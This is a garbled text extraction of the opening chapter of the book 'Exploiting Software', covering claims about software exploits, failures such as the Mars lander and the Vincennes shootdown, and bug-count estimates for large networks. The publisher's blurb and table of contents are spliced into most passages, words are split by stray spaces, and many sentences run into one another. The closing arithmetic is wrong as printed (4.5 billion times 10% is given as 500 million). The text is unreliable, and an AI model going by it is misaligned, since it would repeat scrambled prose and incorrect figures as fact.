id ea w hat t hey ar e r eally up ag ain st . I f we con t inue t o w it h w rit ing defend on ly against t he poor ly ar m ed script k iddie, our defenses are not lik ely t o hold up w ell Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak against t he m or e sophist icat ed at t ack s hap pening in t he w ild t oday . soft w ar e. [ 6]

The time is r ipe for book s like this one, so w e're lik ely t o see t he em er gence of a softw ar e ex ploit disciplin e du ring the next few y ear s.

Why wr it e a book f ull of d anger ous st uf f?! Basically , w e' r e at t em pt ing t o disp el perv asive m isconcept ions about t he capab ilit ies of soft w ar e ex ploit s. Many p eop le don' t r ealize how dan gerou s a sof t w are at t ack er can be. Nor do t hey r ealize t hat f ew of t he classic net w ork secur it y t echnolog ies av ailable t oday do m u ch t o st op t h em . Per hap s t his is b ecause soft war e seem s like mag ic t o m ost p eop le, or per haps it ' s t h e m isinf orm at ion and m ismar k et in g

per pet uat ed by u nscr up ulous ( or possib ly only clueless) secu rit y v endor s. Claim s comm on ly mad e in t he secu rit y u nder gr oun d ser ve as an im por t an t w ak e- u p call t hat w e can no lon ger aff ord t o ignor e.

• •

Table of Content s I ndexSoftware Hackers Think How Some

Expl oit ing Softw a re How to Br e ak Code By Gr eg "Hoglund Giv e a, Gar m an y McGr a craw ack ,

an d he'll be hu ngr y again t om or r ow , t each him h ow t o crack , and h e' ll n ev er be h ungr y again. "

Pub lish er: Addison Wesley —+ ORC Pub Dat e: February 17, 200 4 SBN:people 0- 20 1- 786 95 -8 What Ido t h at b reak soft w ar e m aliciou sly b elieve? How do t hey app roach 51 2of ex ploit ing soft war e? Wh at h ave t hey accom plished? Answ er s t o t he prPages: oblem qu est ions lik e t hese ar e im por t ant if we are t o pr oper ly app roach t he p r oblem of bu ild in g secur e syst em s corr ect ly .

I n som e sense, a k now ledgeable soft w ar e h ack er is one of t he m ost pow er fu l people in sof t het wwor I nsider en r ep lit an r ising act s about How d oes areldbrt oday eak ? .How do satoft t acker s meat akea sof t wyarofe su br rp eak on pfur pose? Why are soft w ar e at t ack s and t h eir r esu lt s. Whet her all t h ese f act s ar e t r ue is an fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? int er est ingcan q uest . Many of t hese claim doisappear o hav e tsome basis What t ools beion u sed t o b reak soft war e?sTh book p trov ides he answ er s.in r ealit y , an d ev en if t hey ar e ex agger at ed , t hey cert ain ly pr ovid e some in sig ht in t o t he hack er is m loaded in d- set .w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Ex p lomalicious i t in g S o ft w a re t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om claim at st lear n h ow r eal at t acks are really carr ied ou t . atI nsiders t ack , y ou m u stt hfir This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he Most of t he glob al 20 00 com pan ies are cur r ent ly inf ilt rat ed by h ack er s. Ev er y scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t m ajor financial in st it u t ion n ot on ly has br ok en secur it y, but hacker s ar e act ively exp loit in g t hem. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Most out sour ced soft w ar e ( soft w ar e d ev elop ed of f- sit e by con t r act or s) is f ull of back door isitext diff icudo lt nt ootaudit When net w orsk and secur y mrem echely anisms w or kin dependent ly . Comp anies t hat com mission t h is kin d of sof t w are h ave not t rad it ionally paid any t ent pat ion tter o ns secur it y at all. Atatt ack Ev ery Rev er sedeveloped engineer innat g ion on ear t h is spending m oney on cyb er w ar far e capabilit ies. Bot h d ef ensiv e an d of fensiv e cy ber w ar far e capabilit ies ex ist . Classic at t acks ag ainst serv er soft w ar e Firew alls, vir us scanner s, and int r usion det ect ion syst em s don 't w ork ver y Sur w ell pr at ising all.atCom t acks putag erainst secuclien rit y vend t softors warhav e e over pr om ised and un derd eliv er ed w it h classic n et w or k secu rit y appr oaches. Not enou gh Tech niqu f or been cr aft ing s ar inpu t at t ent ioneshas paidm taliciou o sof t w e secur it y issu es. The toft echn of ab uf f low sd- issue q uest ion s t o d et er m ine w het her I nsiders en ical makdet e uails se of setferofov ster andar a p er son is " in t he k now . " Her e ar e some of t he claim s com m only cit ed in t his Root k itperson s act ivit y. A " in t he k now " usually believ es t he f ollow in g ab out sof t w ar e exp loit s: Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. Soft war e copy pr ot ect ion ( digit al r ig ht s m anag em ent ) has n ev er w or ked and it n ev er w ill. I t 's n ot ev en possible in t heor y. Hav in g ex ecu t able soft w ar e in binar y f orm is ju st as good , if not bet t er, t han hav ing sour ce cod e. Ther e ar e no sof t w ar e t r ade secr et s. Secur it y t h r ough obscur it y only h elps pot ent ial at t acker s, esp ecially if ob scur it y is u sed t o hide poor desig n.

Ther e ar e hu ndr eds of u ndisclosed ex ploit s in use r igh t n ow ( kn own as 0d ay' s) and t hey w ill v er y likely r emain un disclosed f or y ear s t o come. Nobod y sh ould depend on sof t w ar e pat ches and " f ull d isclosu r e" m ailing list s for secur it y . Such sou rces t end t o lag signif ican t ly behind t he und er gr oun d w hen it com es t o soft w ar e ex ploit . A m aj orit y of machin es at t ach ed t o t he I nt er net ( w it h v ery few ex cept ion s) Table of Content s can be r em ot ely exp loit ed r igh t n ow, in clu ding t hose r un ning t he m ost up- t o• I ndex dat e, f ully pat ch ed v er sions of Micr osof t W in dow s, Linu x, BSD, an d Solar is. Expl oit ing Softw a re How to Br e ak Code Highly p opular t hird - par t y ap plicat ion s inclu ding t h ose f r om Or acle, I BM, By Gr eg SAP, Hoglund , Gar y McGr,aw PeopleSoft Tiv oli, and HP are also su scept ible t o exp loit r igh t n ow as w ell. •

Pub lish er: Addison Wesley

Man y " har dw ar e" dev ices at t ached t o t he I nt er net ( w it h f ew ex cep t ions) can be r em ot ely ex ploit ed r igh t n ow —includin g 3 COM sw it ch es, t h e Cisco r out er I SBN: 0- 20 1- 786 95 -8 and it s I OS sof t w ar e, t he Check point fir ew all, and t he F5 load b alancer .

Pub Dat e: February 17, 200 4

Pages: 51 2

Most cr it ical infr ast r uct ur e t h at cont r ols w at er , gas an d oil, and elect rical pow er can be exp loit ed and cont r olled r em ot ely u sin g w eak nesses in SCADA soft w ar e r igh t n ow. I f a sof m aliciou w an tdo s int you r spar t icular t hey How d oes t w are sbrhacker eak ? How at ot acker m ake sof tm w achine, ar e br eak on wpill ur succeed. pose? Why are Reinst alling you r oper at ing sy st em or u ploading a n ew syst em im t er bad g uy s? fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in gage out af t he com pr omise w ill not help since sk illed hacker s can in fect t h e fir m w are of What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. y our sy st em m icr och ip s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Satesellit es hby avebad b een e tw o ant b e ex t echniqu used guyexp s t oloit bred eakand sofw t willarcont e. I finu y ou t o ploit p roted. ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Accor din g t o insider s in t h e un derg rou nd, all of t hese t hing s ar e happ en ing now . But m even if ave sombook e of tm h ese claimsy ou—and st r et ch t he t r utcer h , itt ainly is h igh t im ee for u sGet t o t ing get bey our ond t he This ust - h ay shock it will educat y ou. collect ive head ou t of t h e sand and ackn owledg e w hat ' s going on. Pret end in g t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t inf orm at ion in t his book does not ex ist an d t h at t h e r esult s are not cr it ical is simp ly silly . Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Bad Software Is Ubiquitous Soft war e secu r it y is t y pically t h ough t of solely as an I n t er net pr oblem, but t his is f ar f rom t he t r ut h . Alt houg h business has ev olv ed t o u se t he I nt er net , m any sof t w are sy st em s ar e isolat ed on special p rop r iet ar y net w or k s or ar e con fined t o ind ividu al m achines. Soft w ar e is clear ly •r espon sib le for Table Content m of u ch m or es t han w r it in g e- m ail, doin g spr eadsheet s, and play in g on- line •gam es. When I ndex sof t w ar e fails, m illions of dollars are lost and somet im es people ar e k illed. Expl oit ing Softw a ret his Howsect to Br e akarCode What f ollow s in ion e som e w ell- k now n exam ples of soft w ar e f ailu res. By Gr eg Hoglund , Gar y McGr aw

The r eason t hat t his k in d of in for m at ion is relevan t t o ex ploit ing soft w ar e is t h at sof t w are failur e t hat h appens " sp ont aneously " ( t h at is, w it hou t int en t ional m isch ief on t he p ar t of an Pub lish er: Addison Wesley at t ack er ) demon st rat es w h at can happ en even w it h out fact or in g in m aliciou s in t ent . Pu t in Pub Dat e: February 17, 200 4 slig ht ly dif fer en t t er m s, con sid er t hat t he dif fer en ce bet w een sof t w ar e safet y and soft w ar e 0-e 20add 1- 786 secur it IySBN: is t h it 95 ion-8 of an int ellig en t ad ver sary b en t on m ak in g you r syst em br eak. Giv en 51 2 t hese Pages: exam ples, im agine w hat a kn owledg eab le at t acker could do!

NASA Mars Lander How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are On e sim ple sof t w are failur e cost US t ax pay er s ab out $16 5 m illion w h en t h e NASA Mar s fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Lan der crashed int o t he sur f ace of Mars. Th e pr oblem w as a basic com p ut at ional t ran slat ion What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. bet w een En glish an d m et r ic unit s of measur e. As a r esult of t h e bu g, a maj or er ror in t h e spacecr aft 's t r aj ect or y cr opped up as it ap pr oached Mars. Th e lander shu t of f it s descent Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d engines p rem at ur ely, result ing in a cr ash . t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - Airport h ave bookBaggage m ay shock y ou—and Denver

it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

The m od er n Denv er I n t ern at ional Air por t h as an aut om at ed bagg age syst em t h at u ses un man nedsof cart w t sarr un ning a f ixed d all conp trroblem olled by soft war e. Wh en it w as fir st Why e ex ploitalong w ill con t inuet rtack—an o be a ser ious br oug ht on- line f or t est in g, car t s could not pr oper ly det ect or r ecov er fr om f ailu res. This w as because of nu soft war e ech p rob lem s. The t sorwkou ld g et out of sy nc, em pt y car t s w ou ld When netmer w orous k secur it y m anisms do n car ot w be " unloaded" of not h in g, an d full car t s w ould be " loaded" f ar bey ond capacit y. Piles of f allen bag s At w ould t ack not pat tev er en ns st op t h e loaders. Th ese soft w ar e b ugs d elay ed t he openin g of t h e air por t f or 11 m ont h s, cost ing t h e airp ort at least $1 million a day . Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e MV-22 Osprey Sur pr ising at t acks ag ainst clien t soft war e The MV- 22 Ospr ey ( Figur e 1- 2 ) is an ad van ced m ilit ar y air craf t t hat is a special fusion Techaniqu f orlifcr m aliciou t m al air plane. The air cr aft and it s aerod yn am ics bet w een ver tes ical t ofaft f hing elicopt er ansdinpu a nor ar e ext r em ely com plex, so m uch so t hat t he p lan e m ust b e cont r olled by a v ariet y of The icalr ol detsof ails b ufTh feris ov er f aft low, slik e m ost , includes sever al r edun dant syst em s in sophist icatt echn ed cont t wof are. aircr case of f ailur e. Dur ing one d oom ed t ak eoff, a f ault y hy dr au lic line bur st . This w as a ser ious Root k itts on e t hat can u su ally b e r ecov er ed fr om . How ever , in t his case, a soft w ar e pr oblem , bu failur e caused t he b ack up syst em n ot t o en gage pr operly . Th e aircr aft crashed and fou r Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak m ar in es wer e k illed. soft w ar e.

Figu r e 1 - 2 . The M V- 2 2 Ospr e y in f li ght . Soph ist i ca t e d con t r ol sof t w a r e ha s li f e- cr it ical im p act . Of fi ci al U . S. N a v y phot o by Phot ogr ap he r' s Ma t e 1 st Cl ass Pet e r Cli ne.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om The USesVicennes at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . IThis n 198 ch edy ou—and a missileitan d sh d owneducat a hosteile t hrGet eat t ing ident if ied t he m 8, usta- hUS aveNavy bookship m aylaun shock will cerott ainly y ou. bey ondbyt he Figur e 13 ) . I n r ealit y , the onb oard r adar and t r ack ing syst em as an enem y figh t er aircr aft ( scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t " t h reat " w as a com m er cial fligh t f illed w it h u nsuspect in g t rav eler s on an Airb us A3 20 ( Figur e 1- 4 ) . Tw o hun dr ed n in et y people lost t h eir liv es wh en t h e plane was sh ot d own . The official Why softthe w arUS e ex ploit ill ed concr t inue a islead ser ious oblem excuse f r om Nav y bw lam y pt ict oanbe dm in gp rout pu t d isplay ed b y t he t rack ing soft w ar e. When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns

Figu r e 1 - 3 . Fi ght er ai r cr a ft of t h e t y pe i den t i fi ed by t he US Vi ce nn es Rev er se engineer in g t r a ck i ng sof t w ar e , a nd subseq ue nt ly de em e d host il e. Classic at t acks ag ainst serv er soft w ar e Nainst ASA clien / D ry de nwar Fl igh Sur pr ising at t acks ag t soft e t Re sea rch Ce nt e r . Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om . An s A3 2 0at,t acks m isid t i fi ed atFigu t ack , ry e ou1m- u4st fir st Air learbu n h ow r eal areen really carras ied a ouft .i ght er je t b y t h e US

Vi cen ne s t r a ck i ng sof t w a r e an d sub se que n t ly shot dow n, k ill in g 2 9 0

This m ust - h ave book m ay shock y ou—and it will cer t ainly in nocen t peopl e. educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t © A irb us, 2 0 0 3 . A ll ri ght s re se rv e d. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Microsoft and the Love Bug The lov e bu g, also k now n as t h e " I LOVE YOU" v iru s w as m ade possible because t he Micr osoft Ou t look e- m ail clien t w as ( badly ) d esigned t o ex ecu t e pr ogr am s t h at w ere mailed fr om

possibly un t ru st ed sour ces. Ap par en t ly, nobod y on t he soft w ar e t eam at Microsof t t h ough t t hr ou gh w hat a v ir u s cou ld d o u sing t h e built - in scr ipt in g f eat ur es. Th e dam age result ing fr om t he " I LOVE YOU" v iru s w as r epor t ed t o be in t he billion s of dollars. [ 7] Not e t hat t his loss w as paid f or by t h e Microsof t cust om ers w h o use Out look , and not by Micr osoft it self. The lov e bug pr ov ides an imp ort ant ex am ple of how an I nt er net vir us can cause v er y lar ge fin ancial dam age t o t he business com m un it y. [ 7]

• •

Sour ces claim this bug cost the econom y billions of dollars ( mostly as a r esult of lost productivity ). For Table of Content s / / n ew s.com .com/ 2100- 1001- 240112.htm l?legacy= cnet. m or e infor mation, see http: I ndex

As h isingbook t o pr y et an ot her lar ge- scale w or m called Blast er ( and a nu m ber of Explt oit Softwgoes a re How toess, Br e ak Code copy cat s) has sw ept t he plan t , causing billion s of dollar s in dam age. Lik e t he lov e b ug, t he By Gr eg Hoglund , Gar y McGr aw Blast er wor m w as mad e possib le by v ulner able soft w ar e. Pub lishat er: all Addison Wesley Look ing t hese cases t og et h er , t h e dat a ar e ex cr uciat in gly clear : Soft w ar e def ect s ar e t he Pub singDat lee:mFebruary ost crit17, ical200 w4eakn ess in com put er sy st em s. Clear ly , sof t w are d ef ect s cau se cat ast rop hic0-f20 ailu res95an I SBN: 1- 786 -8 d r esult in hu ge m onet ar y losses. Similar ly, sof t w ar e defect s allow at t ackPages: er s t o51cause dam age in t en t ionally and t o st eal v aluab le in for m at ion. I n t he f inal 2 analy sis, sof t w are defect s lead dir ect ly t o soft w ar e ex ploit .

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

The Trinity of Trouble Why is mak ing soft w ar e b eh ave so har d? Th r ee f act ors w ork t oget her t o mak e soft war e r isk m anagem ent a m ajor ch alleng e t oday . We call t h ese f act ors t he t r in it y of t rou ble. Th ey ar e •

Table of Content s



I ndex

1 .oitCom plex aitre y How to Br e ak Code Expl ing Softw By Gr eg Hoglund , Gar y McGr aw

2 . Ex t ensibilit y

3 .PubCon lish er: nect Addison iv it y Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2 Complexity

Mod er n sof t w ar e is comp licat ed, and t r en ds sugg est t hat it w ill becom e ev en mor e com plicat ed in t he near f ut u re. For ex amp le, in 19 83 Microsof t Wor d had only 2 7, 000 lines of code ( LOC) but , accor ding t o Nat han My hr v old , [ 8] b y 19 95 it w as u p t o 2 m illion! Soft w ar e engineer havt e spent year? sHow t r yindo g tat o tfacker ig ur e sout howsof t ot w mar easu sofon t w ar e.pose? Ent ir eWhy bookare s How d oess sof w are br eak m ake e brre eak p ur dev otalls, ed t ointsoft w ar edet m ect et rics . Our f avorant it eivon e, soft by Zuse 991 ] , wineighs at bad m ore t han fir ew ru sion ion exist sy st em s, and ir us war e [n1ot k eep g outint he g uy s? 80 0 p ages. Yet be only on et o m betreak r ic seem s t oe? corr e w ell w itides h a num b er oferfs. law s: LOC. I n fact , What t ools can u sed soft war Thelat is book p rov t he answ LOC h as become kn own in some har d- cor e sof t w ar e en gineerin g cir cles as t h e only p lo i t inle gm S oetftr w rEx easonab ic.a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om ed m Mag ote n a story thisatissue available at ied ou t . at t ack[ 8], Wir y ou u stazin firestw rlear h ow on r eal t acksthat areis really carr

http: / / w w w .w ir ed.com / w ir ed/ archive/ 3.09/ m yhr v old.htm l?person= gor don_moore&topic_set= w ir edpeople.

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he The n um ber of bu gs p er t housand lines of code ( KLOC) var ies fr om sy st em t o sy st em . scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Est im at es ar e any w here bet w een 5 t o 50 b ugs p er KLOC. Ev en a sy st em t hat has u nder gone r igor ous q ualit y assu ran ce ( QA) t est ing w ill st ill con t ain b ugs—ar oun d f ive bug s per KLOC. A soft w ar e sysof st em on ly feat ur teinue t estted, likae ser most er cial sof t w are, w ill h ave m an y Why t w art he at exis ploit w ill con o be iouscomm p r oblem m or e bug s—arou nd 50 per KLOC [ Voas and McGr aw , 1 999 ] . Most soft w ar e pr odu ct s fall in t o t he latWhen t er cat egor y itsoft ar eanisms v en dor do s mnist net w ory k. Man secur y mwech otak w enly or k believ e t h ey perf or m r ig or ous QA t est in g wh en in fact t heir m et hods ar e v ery su perf icial. A r ig orou s QA met h odology g oes w ell At tunit ack pat er gnsan d in clu des fau lt inj ect ion and failur e an alysis. bey ond t estt in Rev g m uch sof t w are liv es w it hin com plex m achinery , consider t h e To g ive y er ouseanengineer idea of in how follow ing : Classic at t acks ag ainst serv er soft w ar e ising war Li n e Sur s o fprCo d e at t acks ag ainst clien t softSy steem Tech niqu es f or cr aft ing m aliciou s inpu t is 7 40 0, 000 Solar 17 mThe illiont echn ical det ails of b uf fer ov er f low Netsscape 40 mRoot illionk it s

Space St at ion

10 m illion Space Shu t t le Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft ar e. 7 mwillion Boein g 777 35 m illion

NT5

1. 5 m illion

Lin ux

< 5 million

Wind ows 95

40 m illion

Wind ows XP

As w e m ent ion ear lier, sy st ems lik e t hese t end t o hav e bug r at es t hat v ary bet w een 5 and 50 bu gs per KLOC. On e dem onst rat ion of t h e increase in com plex it y over t h e y ear s is t o consider t he n um ber of LOC in v ariou s Microsof t oper at ing syst em s. Figur e 1- 5 sh ows how t h e Microsof t Wind ow s oper at ing syst em has gr ow n since it s incept ion in 1990 as W in dow s 3. 1 ( 3 m illion LOC) t o it s cur r en t f orm as Window s XP in 200 2 ( 4 0 million LOC) . One sim ple b ut u nf ort u nat e f act hold s or e lines, m ore b ugs . I f t his f act cont in ues t o h old, XP is cer t ainly not t• r ue f or soft wTable ar e:ofmContent s [ 9] Th e obv ious q uest ion t o con sid er given our p ur poses is: How dest ined t o be bug fr ee! • I ndex m any such pr oblem s w ill result in secu rit y issues? And how ar e bug s and ot her w eak nesses Expl oit ing Softw a re How to Br e ak Code t ur n ed int o ex ploit s? By Gr eg Hoglund , Gar y McGr aw [ 9]

Nor has it tur ned out to be, w ith ser ious v ulner abilities discover ed w ithin m ont hs of it s r elease.

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

Figu r e 1 - 5 . W in dow s com p le xi t y a s m ea su r ed by LOC. I ncr e ase d Pages: 51 2 com pl ex it y le ads t o m or e bu gs a nd fl aw s. [ View full size im age]

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e A d esk t op sy st em r unn ing Window s XP and associat ed ap plicat ion s depend s on t he p rop er fu nct ioning of t he ker nel as w ell as t h e applicat ions t o ensur e t hat an at t acker cann ot cor ru pt Sur pr ising at t acks ag ainst clien t soft war e t he sy st em. Howev er , XP it self consist s of appr ox imat ely 4 0 m illion LOC, an d applicat ions ar e becom in g niqu equ ally ( if cr not or m e)aliciou com plex. When sy st em s b ecom e t h is lar ge, b ugs can not be Tech es f or aftm ing s inpu t av oided. The t echn ical det ails of b uf fer ov er f low s Ex acer bat in g t his pr oblem is t h e w idesp read use of low - lev el pr ogr am m ing langu ages su ch as C or C+ + kt hat Root it s do n ot p rot ect ag ainst sim ple k in ds of at t ack s such as bu ffer ov er flow s ( w hich w e discuss in t his book ) . I n add it ion t o pr ov id ing mor e av enues f or at t ack t h rou gh bug s and ot com st ems e itcon easier hide kn orow m ledg ask m alicious cod n Exher p lo di tesign in g S folaw ft ws,a re is plex f illedsywit h t h emak t ools, cept ts,o and e necessar y t oe.bIreak t heor w e could analyze and pr ove t hat a sm all pr ogr am is f r ee of secu r it y pr oblems, b ut soft w yar, e. t his t ask is im possible f or ev en t he sim plest desk t op syst em s t oday , m u ch less t he ent er pr isew ide sy st em s used by bu sin esses or gov ern ment s.

More Lines, More Bugs Con sider a 30 ,0 00- n ode net w or k , t he k ind t h at a mediu m- size cor por at ion wou ld p rob ably hav e. Each w ork st at ion on t he net w or k cont ains sof t w ar e in t h e for m of ex ecut ables ( EXE)

and libr ar ies, and h as, on av er age, about 3, 00 0 ex ecu t able m odu les. On av er ag e, each m odule is ab out 100 K by t es in size. Assum ing t hat a sing le LOC r esult s in abou t 1 0 by t es of code, t hen at a v er y conserv at iv e r at e of fiv e bu gs p er KLOC, each execut able m odu le w ill hav e abou t 5 0 bugs:



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Now f act or in t he f act t hat each host has ab out 3, 000 execut ab les. This m eans t hat each Pub lish er: m achine in Addison t he n etWesley wor k h as about 15 0, 000 u nique bug s: Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

That ' s plent y of bug s t o b e sur e, but t he r eal t r oub le occur s w h en w e consider possible t ar get s an d t h e nu mb er of cop ies of such bug s t hat exist as t ar get s for at t ack. Because t h ese sam e 150 ,0 00 bu gs ar e copied m any t imes ov er 30, 0 00 host s, t he n um ber of bu g Howant d oes sofst twhat arean br eak ? How do tat t acker mge. akeAsof t w000 ar e- m brach eakinon p urwpose? Why are 4. 5 inst iat ion at t ack er can arg et is shu 3 0, e net or k has ab out fir ew alls, ru sion det ect tion syget st em s, and us soft war ot k eep in 000 g outoft he badb gugs uy s? billion b ugint inst ant iat ions o t ar ( accor dinant g tiv o irour est im atee,nonly 15 0, t h ese ar e What t ools u sedt he t o poin b reak un iq ue, bu t can t h atbe 's not t ) : soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . ust - ht ave m ay y ou—and cer trit ainly educat y ou. Get t ing beyf ond t he IThis f w emposit h at 1book 0% of all shock t he b ugs r esult s itinwill a secu y f ailur e ofesome k ind , and ur t her scr ipt id die r eat t f ound in m any s, your em w illotlearn abou conj ectkur e t htat onm lyen 10% of t hose bu gshack caning be book ex er cised ely ( ov er tthe net w or k ) , t hen accor d in g t o our est im at es, our t oy n et wor k h as 5 million rem ot e soft w ar e v ulner abilit ies t o at t ack . Resolv ing 15 0, 000 b ugs is a ser ious ch alleng e, an d pr operly m an aging t he p at ches for Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem 5 m illion bug inst an t iat ion s spr ead ov er 30, 0 00 host s is even w or se: When net w or k secur it y m ech anisms do n ot w or k 4. 5 billion x 10% = 50 0 million secur it y bug inst an t iat ions At t ack pat t er ns 50 0 m illion x 10% = 5 m illion r em ot ely exp loit ab le secur it y 